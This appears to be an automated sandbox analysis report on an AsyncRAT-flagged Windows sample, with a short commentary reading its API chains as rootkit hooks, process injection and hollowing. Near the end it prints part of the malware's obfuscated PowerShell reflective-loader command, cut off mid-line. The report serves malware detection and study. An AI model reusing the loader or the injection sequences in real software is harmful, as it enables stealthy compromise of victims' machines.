Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C5624F0 NtQueryDirectoryFile,GetFileType,StrCpyW,3_2_1C5624F0
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C562DD0 NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,3_2_1C562DD0
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C562214 NtQuerySystemInformation,StrCmpNIW,3_2_1C562214
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C562AA0 NtEnumerateKey,NtEnumerateKey,3_2_1C562AA0
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C562B6C NtEnumerateValueKey,NtEnumerateValueKey,3_2_1C562B6C
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C5627D4 NtQueryDirectoryFileEx,GetFileType,StrCpyW,3_2_1C5627D4
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C563398 GetProcessHeap,HeapAlloc,NtQuerySystemInformation,StrCmpNIW,GetProcessHeap,RtlFreeHeap,3_2_1C563398
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFB4ADF0F30 NtSetContextThread,4_2_00007FFB4ADF0F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFB4ADF0C6D NtWriteVirtualMemory,4_2_00007FFB4ADF0C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFB4ADF0FF4 NtResumeThread,4_2_00007FFB4ADF0FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFB4ADF0A91 NtUnmapViewOfSection,4_2_00007FFB4ADF0A91
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetProcessImageFileNameW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,6_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe | Code function: 7_2_000002E991752B6C NtEnumerateValueKey,NtEnumerateValueKey,7_2_000002E991752B6C
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCE27D4 NtQueryDirectoryFileEx,GetFileType,StrCpyW,10_2_00000213BDCE27D4
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCE2214 NtQuerySystemInformation,StrCmpNIW,10_2_00000213BDCE2214
Source: C:\Windows\System32\dwm.exe | Code function: 12_2_0000026DB1582B6C NtEnumerateValueKey,NtEnumerateValueKey,12_2_0000026DB1582B6C
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C562DD0: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,3_2_1C562DD0
(Reading these together: the routines that wrap NtQueryDirectoryFile(Ex), NtEnumerateKey/NtEnumerateValueKey, NtQuerySystemInformation and NtDeviceIoControlFile, each followed by string compares or copies, are the rootkit's hiding hooks for directory listings, registry enumeration, process listings and the device-I/O path used by the TCP/UDP table APIs. The same chains appear in winlogon.exe, lsass.exe and dwm.exe at addresses whose low 16 bits match the KrnlSetupSus.exe copies (…27D4, …2214, …2B6C), which is what one module mapped at a different base in each process looks like. dllhost.exe carries the injector (integrity-level check via GetSidSubAuthority, then VirtualAllocEx, WriteProcessMemory, NtCreateThreadEx), and powershell.exe carries the NtUnmapViewOfSection / NtWriteVirtualMemory / NtSetContextThread / NtResumeThread sequence used for RunPE-style hollowing.)
                              Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\f71cdae7-f4f8-4fc8-ad0f-e18eef984d56
                              Source: C:\Windows\System32\lsass.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_eco4jnsl.5iq.ps1Jump to behavior
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C562DD0
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C56D654
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C56D7D8
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_00007FFB4ADF9369
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_00007FFB4ADF7342
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_00007FFB4ADF1709
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_00007FFB4ADF2461
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_00007FFB4ADF6596
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_00007FFB4ADF1040
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_00007FFB4ADFD125
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_00007FFB4ADF21C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFB4ADEF895
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFB4ADEDD68
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFB4ADEE339
Source: C:\Windows\System32\dllhost.exe | Code function: 6_3_00000290EDB0CA54
Source: C:\Windows\System32\dllhost.exe | Code function: 6_3_00000290EDB021D0
Source: C:\Windows\System32\dllhost.exe | Code function: 6_3_00000290EDB0CBD8
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140001D80
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140002DDC
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000001400024C4
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140003260
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000290EDD0D654
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000290EDD02DD0
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000290EDD0D7D8
Source: C:\Windows\System32\winlogon.exe | Code function: 7_3_000002E9917221D0
Source: C:\Windows\System32\winlogon.exe | Code function: 7_3_000002E99172CA54
Source: C:\Windows\System32\winlogon.exe | Code function: 7_3_000002E99172CBD8
Source: C:\Windows\System32\winlogon.exe | Code function: 7_2_000002E991752DD0
Source: C:\Windows\System32\winlogon.exe | Code function: 7_2_000002E99175D654
Source: C:\Windows\System32\winlogon.exe | Code function: 7_2_000002E99175D7D8
Source: C:\Windows\System32\lsass.exe | Code function: 10_3_00000213BDCBCBD8
Source: C:\Windows\System32\lsass.exe | Code function: 10_3_00000213BDCBCA54
Source: C:\Windows\System32\lsass.exe | Code function: 10_3_00000213BDCB21D0
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCED7D8
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCED654
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCE2DD0
Source: C:\Windows\System32\svchost.exe | Code function: 11_3_00000158709ACBD8
Source: C:\Windows\System32\svchost.exe | Code function: 11_3_00000158709ACA54
Source: C:\Windows\System32\svchost.exe | Code function: 11_3_00000158709A21D0
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_00000158709DD7D8
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_00000158709DD654
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_00000158709D2DD0
Source: C:\Windows\System32\dwm.exe | Code function: 12_3_0000026DB15521D0
Source: C:\Windows\System32\dwm.exe | Code function: 12_3_0000026DB155CA54
Source: C:\Windows\System32\dwm.exe | Code function: 12_3_0000026DB155CBD8
Source: C:\Windows\System32\dwm.exe | Code function: 12_2_0000026DB1582DD0
Source: C:\Windows\System32\dwm.exe | Code function: 12_2_0000026DB158D654
Source: C:\Windows\System32\dwm.exe | Code function: 12_2_0000026DB158D7D8
Source: C:\Windows\System32\svchost.exe | Code function: 13_3_000002A3EFFC21D0
Source: C:\Windows\System32\svchost.exe | Code function: 13_3_000002A3EFFCCBD8
Source: C:\Windows\System32\svchost.exe | Code function: 13_3_000002A3EFFCCA54
Source: C:\Windows\System32\svchost.exe | Code function: 13_2_000002A3F066D654
Source: C:\Windows\System32\svchost.exe | Code function: 13_2_000002A3F066D7D8
Source: C:\Windows\System32\svchost.exe | Code function: 13_2_000002A3F0662DD0
Source: C:\Windows\System32\svchost.exe | Code function: 15_3_000002C9AFB8CBD8
Source: C:\Windows\System32\svchost.exe | Code function: 15_3_000002C9AFB8CA54
Source: C:\Windows\System32\svchost.exe | Code function: 15_3_000002C9AFB821D0
Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002C9AFBBD7D8
Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002C9AFBBD654
Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002C9AFBB2DD0
Source: C:\Windows\System32\svchost.exe | Code function: 16_3_000002C06F7B21D0
Source: C:\Windows\System32\svchost.exe | Code function: 16_3_000002C06F7BCA54
Source: C:\Windows\System32\svchost.exe | Code function: 16_3_000002C06F7BCBD8
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_000002C06FD4D654
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_000002C06FD42DD0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_000002C06FD4D7D8
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_000002917C3821D0
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_000002917C38CA54
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_000002917C38CBD8
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000002917C3B2DD0
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000002917C3BD654
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000002917C3BD7D8
Source: Install.exe.0.dr | Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: RdLfpZY5A9.exe, 00000000.00000000.1397531330.0000000000644000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameOutput.exe4 vs RdLfpZY5A9.exe
Source: RdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKrnlSetupSus.exe4 vs RdLfpZY5A9.exe
Source: RdLfpZY5A9.exe | Binary or memory string: OriginalFilenameOutput.exe4 vs RdLfpZY5A9.exe
Source: RdLfpZY5A9.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | Process created: Commandline size = 5369
Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.RdLfpZY5A9.exe.12964350.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\ntoskrnl.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: RdLfpZY5A9.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RdLfpZY5A9.exe, alIy4urw6ZG2T9PDfBIjnkiqw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: KrnlSetupSus.exe.0.dr, fBE1wflwwjJOP1BboN3oP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: KrnlSetupSus.exe.0.dr, fBE1wflwwjJOP1BboN3oP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: KrnlSetupSus.exe.0.dr, n2VU5KGecv5aHTrU9Mb0Y.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, fBE1wflwwjJOP1BboN3oP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, fBE1wflwwjJOP1BboN3oP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, n2VU5KGecv5aHTrU9Mb0Y.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, fBE1wflwwjJOP1BboN3oP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, fBE1wflwwjJOP1BboN3oP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, n2VU5KGecv5aHTrU9Mb0Y.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: ntoskrnl.exe.3.dr, fBE1wflwwjJOP1BboN3oP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: ntoskrnl.exe.3.dr, fBE1wflwwjJOP1BboN3oP.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: KrnlSetupSus.exe.0.dr, NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.cs | Base64 encoded string: 'xf3jEcUrMSyjmys4/OnNhvHPGR/qqdPvY70w2iju+1jQeCjSvU15kwu4nKz33CXF'
Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.cs | Base64 encoded string: 'xf3jEcUrMSyjmys4/OnNhvHPGR/qqdPvY70w2iju+1jQeCjSvU15kwu4nKz33CXF'
Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.cs | Base64 encoded string: 'xf3jEcUrMSyjmys4/OnNhvHPGR/qqdPvY70w2iju+1jQeCjSvU15kwu4nKz33CXF'
Source: ntoskrnl.exe.3.dr, NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.cs | Base64 encoded string: 'xf3jEcUrMSyjmys4/OnNhvHPGR/qqdPvY70w2iju+1jQeCjSvU15kwu4nKz33CXF'
Source: ntoskrnl.exe.3.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: ntoskrnl.exe.3.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: KrnlSetupSus.exe.0.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: KrnlSetupSus.exe.0.dr, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, B6YyM3tn1GEMGxan0OhtCDItEFzdSbGF8hoT7DwPUwJukMpi4blkW7U7thwug6Kz0xrZfVtuOok9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Security.evtx.21.dr | Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sysAud
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.21.dr | Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.21.dr | Binary string: C:\Device\HarddiskVolume3al0
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}H
Source: System.evtx.21.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeP
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.dr | Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.21.dr | Binary string: L\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Security.evtx.21.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.syss
Source: Microsoft-Windows-SMBServer%4Operational.evtx.21.dr | Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.21.dr | Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.21.dr | Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.dr | Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.21.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.dr | Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.21.dr | Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.dr | Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.21.dr | Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.21.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.21.dr | Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.21.dr | Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.21.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4%%
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.21.dr | Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.21.dr | Binary string: C:\Device\HarddiskVolume3irec`
Source: classification engine | Classification label: mal100.troj.evad.winEXE@16/81@3/4
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140002DDC GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx
Source: C:\ProgramData\Install.exe | Code function: 2_2_007C151A SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString
Source: C:\ProgramData\Install.exe | Code function: 2_2_007C17A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RdLfpZY5A9.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Mutant created: \Sessions\1\BaseNamedObjects\jiLAdNeWyW3VITIoy
Source: C:\ProgramData\KrnlSetupSus.exe | Mutant created: \Sessions\1\BaseNamedObjects\KjpilRmwK24FRp3u
Source: C:\ProgramData\KrnlSetupSus.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: RdLfpZY5A9.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RdLfpZY5A9.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RdLfpZY5A9.exe | ReversingLabs: Detection: 65%
Source: unknown | Process created: C:\Users\user\Desktop\RdLfpZY5A9.exe "C:\Users\user\Desktop\RdLfpZY5A9.exe"
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Process created: C:\ProgramData\Install.exe "C:\ProgramData\Install.exe"
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Process created: C:\ProgramData\KrnlSetupSus.exe "C:\ProgramData\KrnlSetupSus.exe"
                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''
